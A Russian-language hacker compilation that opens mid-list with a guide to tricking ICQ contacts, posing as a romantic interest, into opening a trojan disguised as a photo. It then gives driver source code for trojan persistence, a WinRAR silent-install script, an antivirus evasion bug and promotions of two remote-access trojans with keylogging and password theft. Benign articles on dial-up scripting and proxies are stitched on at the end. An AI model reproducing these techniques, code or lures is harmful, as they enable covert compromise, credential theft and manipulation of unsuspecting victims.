3) Самый интересный способ. Лучше всего впаривать трояны в виде картинок. Т.е вы просто склеиваете троян с картинокй и даете расширение картинка.jpg .еxe(много пробелов) Это дело можно послать по асе, так как она не покажет расширение exe окошко у нее слишком маленькое не поместится, или по почте. Здесь уже включаем фантазию и думаем как это сделать чтоб юзверь открыл этот файл.

Подробно.Итак, что мы имеем. Предположим такую ситуацию. Вариант номер 1. Просканили Мы диапазон, а там всего там мало некуда не залезешь. Ужас просто. Попробуем сделать так посмотрите внимательно на имена компьютеров. Ну и наметьте себе имя что-то типа Natasha или Valy, не пропускайте также имена Timur или похожие. Может нам придется побыть девушкой или наоборот парнем. Вобщем пол сменить. Ну, так ип мы знаем. Берем программу, которая сканируют порты на наличие аси {--забыл как называется--} самые популярные 1080, 5120, 4000. Ну, как нашли? Если нет, ищем другого. Если удачно то высветится номерок. Смотрим кто это, главное чтобы было достаточно информации.
Т.е прописано мыло и так далее. Если информация скудна, то лучше ищите другого. Ну, если эти этапы пройдены удачно, едем дальше.
Видим, что это девушка, возраст колеблется от 15 до 28, просто если больше, то вероятность что она замужем возрастает. Мы быстренько меняем информацию на подходящую, т.е. соответственно на возраст от 16 до 30. Лучше даже заведите отдельную асю и пропишите ее своими виртуальными данными. Пропишите похожие увлечения, только не переусердствуете, а то получится уж слишком много совпадений. Все готово первый этап пройден. Стучимся в асю к жертве и начинаем разговаривать. Обязательно восхвалите, ник пользователя и скажите, что у нее или него ;) хороший вкус.
Дальше стандартные вопросы и слова. Наконец спросите имя пользователя. И скажите, что оно вам нравится. Только не будьте ангелочком, это настораживает.
Ну и далее долгожданный вопрос У тебя есть фотка? Неважно, что вам ответят. Главное чтобы у вас спросили, есть ли она у вас?
Конечно да. Отсылаем заранее заготовленную фотографию, склеенную с трояном. Естественно лучше высылать не свою фотографию, а взятую, например с сайта знакомств чужую. И постарайтесь сделать так чтобы пользователь после ее отправки у себя нажал на кнопочку открыть, чтобы в этом быть уверенным нужно довести клиента до кондиции. Т.е. чтобы он хотел побыстрее на вас взглянуть. Ну и после для проверки, чтобы узнать посмотрели все-таки на вас или нет. Задайте вопрос типа «Как думаешь, в каком клубе сделана эта фотография?» или что-то типа того. А лучше послать фотографию на которой изображены два человека. Тогда вас по любому спросят, который из них вы? Да и не посылайте фотографии размером 10Х10 склеенным с трояном размера 200kb. Заметить элементарно, такое попустительство с вашей стороны.

Если вам такой способ непонраву можно сделать подругому.
Вариант 2.
Заведите себе отдельное мыло, Например admini@mail.ru. Здесь опять воля вашей фантазии и пошлите письмо. С примерно таким содержанием.

Здрасте.........
Мы производим тестирование программы с помощью, которой вы можете зарабатывать деньги в интернете просто
находясь в нем. Она фиксирует время вашего нахождения в интернете,...... и так далее. Что придет на ум.
Всего хорошего.

И будет лучше, если вы не просто так вышлете троян, а, например склеете ее с какой-то прогой. Т.е найдите программу, которая для установки требует другие файлы. Например, при инсталяции извлекает из какого-то архива файлы. Возьмите и удалите этот архив. И посмотрите как себе тогда поведет установочный файл. Если программа не может установиться без этого архива чудесно. Только продумайте этот момент, а то как-то некрасиво будет, если выскочит окошко сейчас будет установлен Flash, а только потом выскочит ошибка при копировании.

Продумали? Смело клейте с троей и вперед.Только один важный момент отсылайте такие письма через специальные службы и пользуйтесь специальными программами, которые сотрут ваш ип из заголовка письма. Т.е. Не забывайте об анонимности, а то вас могут легко найти.{А вот про то, как надо отсылать анонимно я точно не помню, где-то видел хорошую статью на эту тему, а где забыл} Подумайте о безопасности. Заведите для паролей отдельную почту. Только для этого!!!!!. Всегда. Запомните, всегда заходите на неё через анонимный прокси. Ну, вот вроде и все.


Маскировка - Способ № 1

В этой статье я расскажу и покажу на примере как можно замаскировать вашего троянца так, что не один не далёкий пользователь компьютера не сможет найти то место в системе, откуда он запускается.

И так преступим.Как известно большинство троянцев прописывает себя в реестре, в разделе автозагрузки(HKLM\Software\Microsoft\Windows\CurrentVersion\Run). Но в наше время это уже не является надёжным методом запуска троянца. Как же быть в такой ситуации? Выход напрашивается сам собой,нужно сделать такой метод загрузки,который ещё не известен пользователям, да и который не бросался бы в глаза. Одним из таких способов является написание некой программы(читай драйвера), который бы ,например, прописывал нашего троянца в реестре каждый раз при загрузке. Такой программой является драйвер устройства в Windows. Я рассмотрю драйвер только для Win9x ввиду того, что большинство пользователей в настоящее время использует системы именно этого класса. И так в чём же весь смысл. А вот в чём :прописав драйвер один раз в реестре,при установке троянца на компьютер жертвы, (в специальном месте,о котором и не каждый-то продвинутый пользователь знает, не говоря уже о рядовом) мы обеспечим запуск нашего троянца каждый раз после перезагрузки системы(точнее мы просто будем прописывать его в ключе авто запуска в реестре). И так вот исходные текста нашего драйвера.

ctrlddb.asm

.386p

;******************************************************************************
; I N C L U D E S
;******************************************************************************

WIN40COMPAT equ 1
include vmm.inc

;============================================================================
; V I R T U A L D E V I C E D E C L A R A T I O N
;============================================================================
DECLARE_VIRTUAL_DEVICE CTRL, 1, 0, ControlProc, UNDEFINED_DEVICE_ID, \
UNDEFINED_INIT_ORDER

VxD_LOCKED_CODE_SEG

;===========================================================================
;
; PROCEDURE: ControlProc
;
; DESCRIPTION:
; Device control procedure for the CTRL VxD
;
; ENTRY:
; EAX = Control call ID
;
; EXIT:
; If carry clear then
; Successful
; else
; Control call failed
;
; USES:
; EAX, EBX, ECX, EDX, ESI, EDI, Flags
;
;============================================================================

BeginProc ControlProc
Control_Dispatch SYS_VM_INIT, _OnSysVMInit, cCall,
clc
ret

EndProc ControlProc
VxD_LOCKED_CODE_ENDS
END

ctrl.c

#define WIN40COMAPT

#include
#undef WANTVXDWRAPS
#include
#include
#include "config.h"
BOOL OnSysVMInit(DWORD vh)
{
VMMHKEY key;
char data[MAXPATH];
ULONG datasize;
ULONG i;
if (VMM_RegCreateKey(HKEY_LOCAL_MACHINE ,VXDDATAPATH,&key)!=ERROR_SUCCESS)
return TRUE;
for (i=0;i data[i]=0;
datasize=MAXPATH;
if (VMM_RegQueryValueEx(key,VALUENAME,NULL,NULL,&data,&datasize)!=ERROR_SUCCESS)
{
VMM_RegCloseKey(key);
return TRUE;
}
VMM_RegCloseKey(key);
if (VMM_RegCreateKey(HKEY_LOCAL_MACHINE ,AUTORUNPATH,&key)!=ERROR_SUCCESS)
return TRUE;
if (VMM_RegSetValueEx(key,APPNAME,NULL,REG_SZ,&data,datasize)!=ERROR_SUCCESS)
{
// No Freeing needed
}
VMM_RegCloseKey(key);
return TRUE;
}

config.h

#define APPNAME "MyTroyan"

#define VXDDATAPATH "System\\CurrentControlSet\\Services\\VxD\\forceloader"
#define VALUENAME "LoaderData"
#define MAXPATH 256
#define AUTORUNPATH "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"

Остальные файлы необхадимые для зборки вы можете найти в прилогающемся архиве,в прочем как и уже готовый драйвер.Итак рассмотрим по-подробнее зачем ,что нужно.Файл ctrlddb.asm это всего лишь декларация нашего драйвера через макросы(доступны только для ассемблера),он отвечает всего на одно событие-SysVMInit,это событие посылается всем драйверам ,которые его обрабатывают,когда системная виртуальная машина(в ней работают все Win32 приложения)готова к работе,в это время нам доступен и реестер и всё остальное.Именно в этот момент мы и прописываем нашего троянца в реестер(если пользователь удалил на него ссылку),Строка "#define WIN40COMPAT" говорит компилятору ,что наш драйвер должен быть совместим с Windows95,так как в WIndows98 есть дополнительны сервисы,которых нет в 95.Далее идут необходимые команды подключения заголовков и затем функция,которая реагирует на событие(SysVMInit),в этой функции и делается вся работа.Как вы наверное уже заметили имена всех функций начинаются с VMM_ ,на самом деле это вызовы соответствующих сервисов менеджера виртуальных машин,но для нас это не важно.Синтсксис у этих функций такой же как и у соответствующих функций из Win32 API так,что останавливаться на нём не будем,разберём лучше ,что какая сторка делает. В начале идёт декларация переменных,затем с помощью VMM_RegCreateKey мы открываем подключ в ключе HKEY_LOCAL_MACHINE (может быть любой другой например HKEY_CURRENT_USER)VXDDATAPATH -это адресс подключа где находиться строка ,которую драйверу необходимо прописать в реестре. Далее с помощью VMM_RegQueryValueEx мы читаем переменную из этого ключа с именем VALUENAME (предполагается,что это строкавой параметр,и проверка на это не делается),затем мы закрываем ключ и открываем ключ куда нужно записать то,что му прочитали(имя этого подключа определено в AUTORUNPATH) .Далее мы просто вписываем ранее прочитаное значение в переменную определённую в APPNAME и закрываем ключ.Всё наш троянец в реестре(в AUTORUNPATH появится строка вида "MyTroyan c:\windows\system\troyan.exe" ,где MyTroyan это имя переменной).Обратите внимание,что при любой ошибке функция всёравно возвращает TRUE ,это нужно делать потому,что если мы вернём FALSE система подумает ,что что-то нетак и перезагрузит машину.

Ну вот в принципе и всё,что я хотел рассказать.По всем вопросам и замечанием можете писать мне .

И в заключении традиционно:За использование материала изложенного в данной статье автор ответственности не несёт,используйте на свой страх и риск.

Архив с иходниками прилагаю,вот он.

P.S.:Собрать исходники можно установив Windows98 DDK(Device Development Kit).


Маскировка - Способ № 2

Что если под рукой склеивальщика нету, а надо срочно? Качать! А если ссылки забиты, да и новый антитварь детектит? Вот тут то и пригодится наш любимый WinRar.

Всё очень просто, но перед переходом к делу перечислю достоинства и недостатки данного метода склеивания.

Плюсы [+++]
1. Никогда антитварь не будет считать этот файл вирусом
2. Доступность метода
3. Сжатие файлов
4. Лёгкая модификация уже добавленных файлов

Минусы [- - -]
1. Жертва может просмотреть файлы
2. Недостаточная быстрота работы
3. Антитвари шарют в архивах

Для большей маскировки я советую вам скачать программу MicroAngelo 98
(ftp://ftp.mgul.ac.ru/pub/Win/Graph/Icon/eds_mike98.zip), которая позволит заменить стандартный значок на значок картинки.

Приступим.

Быстренько выбираем в проводнике наши отправляемые файлы и из контекстного меню создаём SFX-архив со следующими параметрами:

Unpuck to temprorary folder
Hide all
Overwrite all files

После создания, archivename.exe нужно открыть в винраре и перейти в режим редактирования комментария. Все необходимо свести к виду

;The comment below contains SFX script commands

Setup=file1
Setup=file2
Setup=file3
TempMode
Silent=1
Overwrite=1

где file1, file2, file3 то, что надо запустить. Хочу обратить ваше внимание что сервер троя должен быть настроен на НЕпоказывание фиктивного сообщения(типа Программа вызвала ошибку), а то это вызовет подозрение. В заключение можете поменять иконку прогой которую я указал выше и смело впаривать врагу.


Маскировка - Способ № 3

Этот метод маскировки действует только на NT

А началось все с того, что наш уважаемый соотечественник ZARAZA из Нижнего Новгорода сообщает об обнаружении уязвимостей в популярном антивирусе KAV (он же Kaspersky Antivirus). Две уязвимости связаны с ошибками при обработке слишком длинного имени пути файла. NTFS позволяет создать путь неограниченной длины, однако Windows API не поддерживает длину пути более 256 байт. Для предотвращения проверки длинного имени пути API, можно использовать префикс \\?\ в имени файла (это документированная особенность Win API). Было обнаружено, что KAV при обработке длины пути, тем не менее, либо рушится, либо зависает с поглощением всех ресурсов процессора. Также можно удалённо завесить сервер с установленным серверным KAV, однако для этого необходим доступ с возможностью записи в директорию). Вторая уязвимость связана с тем, что при создании файла с подобным длинным путём может предотвратить его обнаружение KAV (а файл может оказаться вирусом или трояном, например). Третья уязвимость связана с тем, что при создании NTFS-файла c именем специального зарезервированного устройства (например, aux.vbs или aux.com) также приведёт к тому, что его невозможно будет идентифицировать при помощи KAV. Проверялось на версии KAV 4.0.9.0 в ОС Windows NT 4.0 и Windows 2000.

Так что юзайте этот баг наздоровье.


Anti-Lamer BackDoor

Троян наш, полностью на русском. Позволяет практически полностью управлять чужим компьютером.
Довольно часто обновляеться сервак и некоторое время их не палит каспер. Из плюсов еще отмечу что сам сервак весит относительно мало для таких троев 178к (почти на 100 к меньше чем смерть ламера), редактор сам может склеить сервак файлом и поменять иконку на любую (есть у троя свой набор или же вы сами клеите любой).. через клиентскую часть быстро можете проверить новый чистяк.
Вещь прикольная советую всем.

Функции
Сервер: Закрыть, перезагрузить, удалить, менять настройки, всё как обычно
Сведения: Подробнейшие сведения о компе: имя юзера и компа, системные папки,язык и т.д.
Приколы: Вытаскивать CD-ROM, делать с рабочим столом всё, что хочешь, и т.д.
Мышь: Работы с мьшью - отключить, увеличить скорость и т.д.
Сообщения: или месаги, кто как называет - посылать сообщения.
Окна: работа с окнами - закрыть, скрыть, показать, отключить и т.д.
Экстра: Открыть Пуск, удалить обои, перезагрузить комп,отключить клаву, сменить дату и т.д.
Файлы: Работа с файлами. Можете покапаться в файлах жертвы.
Реестр: Работа с реестром. Изменять, создавать параметры и т.д.
Экран: Разрешения экрана, снимок экрана и "Съедание экрана (как pacman)
Клав.Шпион: слежение за нажатием клавиш.
Принтер: отпечатать текст на принтере.
Пароли: получение паролей - кэшированных и DialUp'ных.
Цвета Windows: установка цвета - рабочий стол, бэкграунд и т.д.
Писать на экране: писать текст на экране.
Тел.Соединения: Работа с телефонными соединениями.
Буфер обмена: удаление, запись в буфер и т.д.
Чат: Чат с жертвой или клиентом (другим ALB.exe)

В данный момент у трояна отсутствует офсайт, вы можете найти троян используя Раю (www.raya.ru)

Содержание zip архива
В данный архив входят 5 файлов:

ALB.exe - клиент (315 кб)
Server.exe - сервер (178 КБ)
EditSrv.exe - редактор сервера (216 кб)
Edit.Dll - для склейки файлов (13 кб)
english.reg - для английской версии (77 байт)
Прочти.htm - описание трояна


Lamers Death

Последняя версия трояна Lamers Death 2.6
Небезизвестный трой удаленного администрирования.
Очень сильно похож на предидущий.. правда чуть больше функций. Чем они отличаються: Сервер ламер тяжелее почти на 100к .. да и с обновлениями не так уж все хорошо. Кстати, на сегодняшний день последний "чистый" сервер палит АВП.
При попадании на комп жертвы его винда начинает "немного" не так работать.. есть функция "ухода" троя через некоторое время (при этом может с собой забрать и винду).. а так же установки пароля на сервак.
На оффсайте троя действует (правда не всегда он работает) пейджер, куда трой может высылать пароли и не только.
Тама же можете найти ФАК, помощь впаривании трояна и еще некоторые интересные утилиты, которые опишу "в следующей серии".

Возможности Lamers Death 2.6(взято с файла readme)

Множество приятных мелочей, которых нет нигде;
Приклеиваться к системным файлам для большей живучести;
Воровать Кэшированные и Диалапные пароли, а также пароли популярных звонилок EDialer и MDialer;
Присылать _новые_ пароли и другую информацию на ваш EMail, что очень удобно.
Присылать уведомления на пейджер LD (http://ldteam.org)
Уведомлять вас на ICQ, когда юзер вышел в Онлайн;
Выполнять автоапгрейд;
Скачивать и запускать файл по указанному url;
Запрещать чтение и изменение настроек без предъявления пароля;
Следить за жертвой автообновлением позиции курсора мыши и содержимого экрана;
Менять дату сервера на идентичную системным файлам Windows;
Открывать порты только в онлайне;
Автоудаляться через указанное количество дней;
Закрывать окна файрволов при обнаружении;
Закрывать окна известных антивирусов;
Фиксить АВП;
Отправлять на icq отчёты об ошибках;
Убивать, Закрывать, Показывать, Скрывать и Запрещать доступ к любому окну и процессу, менять заголовки окон;
Выполнять стандартные операции с файлами, такие как Просмотр, Копирование, Удаление, Изменение, Поиск, Скачивание, Закачивание, Запуск и Воспроизведение, а также возможность просмотра по введённой маске;
Эмитировать нажатия клавиш
Устраивать чат с жертвой
Создавать, Удалять, Изменять ключи и значения реестра;
Управлять громкостью удалённого компьютера;
Шпионить за нажатыми в оффлайне и в онлайне кнопками, сохранять архив нажатий;
Показывать количество соединений и удалённые адреса каждого отдельного пользователя;
Устраивать чат для всех пользователей, подключённых к данному серверу;
Мигать лампочками, Изменять время и дату на удалённом компьютере, Открывать введённый URL в броузере и управлять выходом из Windows;
Управлять CDROM'ом, включать/отключать сочетание Ctrl+Alt+Del, просматривать и менять содержимое Буфера обмена, Скрывать и показывать Таскбар, Трей, Часы, Рабочий стол;
Менять местами кнопки Мыши, эмулировать одиночные и двойные нажатия любой кнопкой в любом месте экрана, Следить за перемещениями курсора;
Сдирать скриншоты разного качества и размера, Следить за определённой областью экрана удалённого компьютера, Управлять питанием монитора и менять текущее разрешение;
Выводить сообщения и окна ввода всех стилей;
Собирать подробнейшую информацию о системе:
Размер и процент использования файла подкачки;
Текущее разрешение монитора;
Временная папка и папка ОС;
Производитель, модель и частота процессора;
Общее количество и процент незанятой физической памяти;
Модель сетевой карты, если таковая имеется;
Подробная информация о каждом диске системы;
Зарегистрированное имя пользователя и организация;
Список почтовых ящиков со всеми параметрами;

Также есть возможность Изменения имени файла-сервера, Пароля и Рабочего порта сервера. Ессесно присутствуют стандартные операции работы с сервером, такие как Закрытие, Удаление и Перезапуск;
Вы можете указать папку для временных и скаченных файлов, настроить по своему усмотрению Интерфейс клиента и Качество камеры;
Также клиент включает в себя утилиту Ху из (пинг, лукап) и красивый РУССКИЙ интерфейс!
И это только основные возможности данного трояна.


Язык сркриптов

Язык сркиптов

1.) Введение.

Эта статья была написана для ответа на вопрос "Как написать свой скрипт для dial-up соединения?" часто задававшийся в эхах фидо, на BBS, а теперь время от времени появляющийся у тех, кто хочет использовать сети x.25.
Фактически данный документ является русским, несколько измененным, вариантом документа Dial-Up Scripting Command Language For Dial-Up Networking Scripting Support. Часть примеров была взята из скрипта для подсоединения к серверу SPb Code|NET.
Так для чего же нужны dial-up скрипты? Они позволяют автоматизировать операции по передаче/приему и обработке информации, которой обмениваются собой компьютеры при соединении по модему. Причем эта передача ограничивается пересылкой логина , пароля и получением IP адреса только для соединения с некоторыми Internet провайдерами, в основном же эти скрипты используются для подсоединения к BBS, а так же к специализированным серверам, где передав несколько строк можно сразу получить нужную информацию, а не искать ее по директориям (так сделано на серверах Spb Code| NET). Так же с помощью скриптов можно указывать, какие услуги нужны для устанавливаемого соединения.
Если вам интересно каким образом можно использовать скрипты зайдите на любую поисковую машину и введите "Dial-up scripting".
Сам язык скриптов сильно напоминает язык BASIC, поэтому тем кто его знает будет проще.

2.) Переменные

В сценарии подключения можно использовать переменные. Имена переменных должны состоять из набора букв английского алфавита цифр и знака подчеркивания - "_", но начинаться имена могут только с буквы или знака "_". В качестве имен переменных нельзя использовать зарезервированные слова, при работе скрипта такие имена будут обрабатываться как команды. Для использования предусмотрены три типа переменных:

Объявление переменных происходит следующим способом:
[тип] [имя переменной]=[начальное значение переменной]

Пример:
…
integer attempt = 3
; объявление переменной attempt типа integer и значением 3 string szLogin = "username:"
; объявление переменной szLogin типа string и значением
username:
…
Для переменных типа string предусмотрен ряд
специальных символов (литер), они следующие:

Пример:
…
transmit "^M"
; посылка символа возврата
каретки
transmit "Rook^M"
; посылка строки, содержащей последовательность
символов и знак перевода
; каретки.
transmit ""
waitfor ""
;ожидание
ответа от удаленного компьютера
…
Существуют несколько системных переменных, которые определяются при вводе данных в диалоговом окне dial-up подключения и при выполнении команд. Эти команды представлены ниже:

Менять такие переменные пользователь не может, но допускается их использование как параметров команд.

Пример:
…
transmit
$USERID
transmit $PASSWORD
; пересылка имени пользователя и пароля на
удаленной компьютер.
…
Примечание: необходимо учитывать тип этих переменных при использовании в командах.

3.) Математические выражения.
Математическое выражение - это комбинация математических операций и аргументов, представленных переменными или постоянными величинами. Выражения могут использоваться как параметры для команд. Для использования
предусмотрены следующие математические операции (положение в таблице показывает старшинство операции):

Примеры:
…
transmit "Hello from "+$USERID
delay
64/(32-(3+4*3))
…

Поскольку в этом языке нет типа real дробные результаты будут округляться.

4.) Команды, ключевые и зарезервированные слова.

Все команды являются зарезервированными слова- это значит, что их нельзя использовать в качестве имен переменных, так же как и ключевые слова, которые представляют собой терминалы языка.
В языке скриптов для dial-up соединений есть следующие зарезервированные слова:

;
Точка с запятой показывает, на то, что все, идущее за ней является комментарием и не обрабатывается.
Пример:
; Это комментарий
integer a
; Следующий комментарий
AND
Логическое "Или"

Пример:
…
boolean a
boolean
b
…
if !a and b then
endif
…
BOOLEAN
Ключевое слово для задания логического типа для переменной
Пример:
…
boolean name [ =value ]
…
DATABITS
см. set
DELAY nSeconds
Пауза между выполнением команд в секундах, записанная в nSeconds.
Пример:
…
integer
seconds=5
…
delay 10
delay Seconds+2
…
DO
cм. while
ENDIF
см. if
ENDPROC
Указывает на конец процедуры
ENDWHILE
см. whille
EVEN
см. set port parity
FALSE
Булевская переменная, указывающее, что результат операции над булевыми переменными оказался ложным
GETIP [value]
Команда ожидает, когда будет получен IP адрес с удаленного компьютера. Если передается несколько IP адресов, они
записываются в строчную переменную, для получения определенного IP адреса используйте параметр value.
Пример:
…
szAddress = getip
; передает первый полученный IP адрес в строку szAddress
szAddress = getip
2
; передает второй полученный IP адрес в строку szAddress
…
GOTO label
Переход на метку в скрипте указанную как label и продолжение выполнения команд с этого места.
Пример:
…
IF
$SUCCESS then
goto _out br> endif
Transmit "bbs^M"
Goto
end
_out:
transmit "err^M"
end:
…
Примечание: место на которое необходимо перейти должна иметь тоже имя, что указано в команде goto, но после нее указывается знак двоеточия.
HALT
Прерывает работу скрипта, но не закрывает диалоговое окно. Перезапустить скрипт в этой сессии уже нельзя.
IF condition THEN
Ряд комманд
ENDIF
выполняется ряд операций от then до endif,
если condition=true;
Пример:
If $USERID == "Rook" then
transmit "CODENET.MEMBER.SENIOR.rook^M"

endif
INTEGER
Ключевое слово для задания целочисленного типа для переменной
Пример использования:
…
integer name [ =value]
…
IPADDR
см. set
KEYBOARD
см. set
MARK
см. set port parity
MATCHCASE
см. waitfor
NONE
см. set port parity
ODD
см. set port parity
OFF
см. set screen keyboard
ON
см. set screen keyboard
OR
Логическое "И"
PARITY
см. set
PORT
см. set
PROC name
Указывает на начало процедуры. Любой скрипт должен содержать процедуру main, только по ней рн начинает и заканчивает выполнение. При этом общий вид процедуры такой:
proc main
Объявление переменных
…
Блок команд
endproc
RAW
см. transmit
SCREEN
см. set
SET
SET PORT DATABITS 5|6|7|8
Изменяет количество бит в байтах, пересылаемых и получаемых во время сессии. По умолчанию значение
устанавливает таким, какое указано в настройках соединения.
Пример:
set port databits 7
SET PORT PARITY none|odd|even|mark|space
Изменяет четность порта через который передаются и принимаются данные во время сессии. По умолчанию значение устанавливает таким, какое указано в настройках соединения.
Пример:
set port parity even
SET PORT STOPBITS 1|2
Изменяет число стоп-битов на время сессии. По умолчанию значение устанавливает таким, какое указано в настройках
соединения.
Пример:
set port stopbits 2
SET PORT SCREEN KEYBOARD on|off
Включает или выключает ввод с клавиатуры в окне терминала.
Пример:
set screen keyboard on
SET IPADDR _string
Устанавливает IP адрес для текущей сессии. Строка должна быть записана в формате IP адресов.
Примеры:
_ipaddress="11.83.23.1"
set ipadd
_ipaddress
set ipaddr "11.83.23.1"
set ipaddr getip
SPACE
см. set port parity
STOPBITS
см. set
STRING
Ключевое слово для задания строкового типа для переменной
Пример использования:
…
string name [ =value]
…
THEN
см. if
TRANSMIT _string [,raw]
Пересылка строки _string на удаленный компьютер. Удаленный компьютер может распознать escape последовательность и возврат каретки, если не используется параметр raw. Параметр raw используется, когда пересылаются $USERID и $PASSWORD в которых имеются указанные последовательности, иначе они будут восприняты как специальные символы. На практике это значит что пароль abc^Mddea будет послан как
abc^M.
Примеры:
…
transmit "SLIP^M"
transmit $USERID,
raw
…
TRUE
Булевская переменная, указывающее, что результат операции над булевыми переменными оказался верным
UNTIL
см. waitfor
WAITFOR string [,matchcase][then label {,string1[,matchcase]then
label1}][until time]
Команда ожидает получения строк от удаленного компьютера, которые ассоциируются со string, string1 и так далее. Параметр sting не чувствителен к регистру, если не указан параметр matchcase. Если известная строка была получена и для нее был установлен параметр then label, то скрипт перейдет на указатель label. Параметр until устанавливает время ожидания ответа от удаленного компьютера, прежде чем перейти к следующей команде, без этого параметра компьютер будет ожидать постоянно.
Примеры:
…
Waitfor
"Login:"
; это означает, что будет ожидаться появление строки
Login:
waitfor
"Login:" then _login
"Password:" then _password
until 15
…

WHILE condition DO
Ряд команд
ENDWHILE
Цикл по командам, пока условние condition не станет ложным.
Пример:
…
integer
attempt=3
integer n=0
while n transmit "^M"
waitfor "Login: " until 15
if $SUCCESS then
goto
_login
endif
n=n+1
endwhile
…

5.) DUN
Файлы с таким расширением создаются мастером новых соединение и представляют собой запись всех установленных параметров, включая все настройки модема и скрипт для соединения. Как ни странно, но в чистом виде на диске они не записываются, но если воспользоваться сервисом drag&drоp и перенести созданный файл в любую папку, то при просмотре можно будет увидеть подобный файл (файл экспорта):
;Файл
aanet.ru.dun

[Entry]
Entry_Name=AANET.RU
Import_Name=AANET3
Multilink=no

[Phone]
Dial_As_Is=no
Phone_Number=XXXXXXX
Area_Code=
Country_Code=7
Country_ID=7

[Device]
Type=modem
Name=LT Win
Modem
Settings_Size=108
Settings=1C000100130101100100180060100001010102001C02020002C22102122200
2000400A500100180200311340050000600600060034000000300000003000000030000
00000000000000000003C000000000000000000000001000000D3010000000000000000
0000000000000C

[Server]
Type=PPP
SW_Compress=no
PW_Encrypt=no
Network_Logon=no
SW_Encrypt=no
Negotiate_NetBEUI=no
Negotiate_IPX/SPX=no
Negotiate_TCP/IP=yes

[TCP/IP]
Specify_IP_Address=no
Specify_Server_Address=yes
DNS_address=XXX.XXX.XXX.XX
DNS_Alt_address=XXX.XXX.XXX.XX
WINS_address=0.0.0.0
WINS_Alt_address=0.0.0.0
IP_Header_Compress=yes
Gateway_On_Remote=yes

[Scripting]
Name=Pppmenu.scp

[Script_File]
0=;
1=; This is a script file that demonstrates how
2=; to establish a PPP connection with a host
3=; that uses a menu system.
4=;
5=; A script file must have a 'main' procedure.
6=; All script execution starts with this 'main'
7=; procedure.
8=;
9=
10=
11=; Main entry point to script
12=;
13=proc main
14=
15=; Change these variables to customize for your
16=; specific Internet service provider
17=
18=integer nTries=3
19=
20=; This is the login prompt and timeout values
21=
22=string szLogin = "username:"
23=integer nLoginTimeout = 3
24=
25=; This is the password prompt and timeout values
26=
27=string szPW = "password:"
28=integer nPWTimeout = 3
29=
30=; This is the prompt once your password is verified
31=
32=string szPrompt="annex:"
33=
34=; This is the command to send to establish the
35=; connection. This script assumes you only need
36=; to issue one command to continue. Feel free
37=; to add more commands if your provider requires
38=; it.
39=
40=;
41=; This provider has a menu list like this:
42=;
43=; 1 Our special GUI
44=; 2 Establish slip connection
45=; 3 Establish PPP connection
46=; 4 Establish shell access
47=; 5 Download our software
48=; 6 Exit
49=;
50=; annex:
51=;
52=
53=string szConnect = "3^M"
54=
55=; Set this to FALSE if you don't want to get an IP
56=; address
57=
58=boolean bUseSlip = FALSE
59=
60=
61=; -----------------------------------------------------
62=
63=
64=; Delay for 2 seconds first to make sure the
65=; host doesn't get confused when we send the
66=; two carriage-returns.
67=
68=delay 2
69=transmit "^M^M"
70=
71=; Attempt to login at most 'nTries' times
72=
73=while 0 < nTries do
74=
75=; Wait for the login prompt before entering
76=; the user ID, timeout after x seconds
77=
78=waitfor szLogin then DoLogin
79=until nLoginTimeout
80=
81=TryAgain:
82=transmit "^M" ; ping
83=nTries = nTries - 1
84=
85=endwhile
86=
87=goto BailOut
88=
89=DoLogin:
90=; Enter user ID
91=
92=transmit $USERID, raw
93=transmit "^M"
94=
95=; Wait for the password prompt
96=
97=waitfor szPW until nPWTimeout
98=if FALSE == $SUCCESS then
99=goto TryAgain
100=endif
101=
102=; Send the password
103=
104=transmit $PASSWORD, raw
105=transmit "^M"
106=
107=; Wait for the prompt
108=
109=waitfor szPrompt
110=
111=transmit szConnect
112=
113=if bUseSlip then
114=; An alternative to the following line is
115=;
116=; waitfor "Your address is "
117=; set ipaddr getip
118=;
119=;if we don't know the order of the IP addresses.
120=
121=set ipaddr getip 2
122=endif
123=goto Done
124=
125=BailOut:
126=; Something isn't responding. Halt the script
127=; and let the user handle it manually.
128=
129=set screen keyboard on
130=halt
131=
132=Done:
133=
134=endproc
135=

Как уже было написано выше, в файл DUN, в раздел [Script_File], включается Dial-up скрипт целиком с коментариями и с пустыми строками. В раздел [Scripting] записывается имя файл со скриптом, это сделано для того, чтобы при подсоединении была возможность автоматически обновить используемый скрипт.

6.) Заключение.

В Windows 9x/Me существует такая интересная вещь - для одного файла DUN могут существовать 3 разные настройки:
1. Хранится собственно в файле создаваемом мастером.
2. Хранится в файле экспорта, а при его изменении создается новое соединение (а не изменяется существующее).
3. Хранится непонятно где, а задается в дебрях этого диалога:
remote


Proxy

Прокси-серверы и их предназначение.

Зачастую пользователи, услышав слово прокси-сервер, либо не понимают его истинного предназначения, либо же просто считают, что прокси-сервер - это обыкновенный сервер, и разницы между обычным сервером и прокси практически никакой. Данная статья предназначена для разъяснения понятия прокси-сервер и ответа на вопрос
"Что же такое прокси-сервер?"

Прокси-серверы используют для того, чтобы обеспечить эффективный и безопасный доступ в Интернет. Их устанавливают в различных организациях для обеспечения взаимодействия локальной сети с глобальной сетью Интернет. В качестве средства дополнительной безопасности прокси-серверы используются как межсетевые экраны.
Рассмотрим функционирование прокси-серверов. Когда клиент пересылает запрос на какой-то конкретный документ прокси-серверу, то сначала этот сервер получает требуемый документ по соответствующему протоколу, а затем уже пересылает его клиенту. Запросы клиента передаются серверу по протоколу HTTP (HyperText Transfer Protocol). Однако это не является ограничением, кроме этого, не имеет значения и тип затребованного документа, поскольку в самом запросе к серверу содержится полная информация о необходимом документе, в частности его тип и необходимый для этого протокол. Для того чтобы это осуществилось, прокси-сервер сам анализирует пришедший запрос и уже после этого определяет нужный адрес, по которому и будет перенаправлен пришедший запрос.
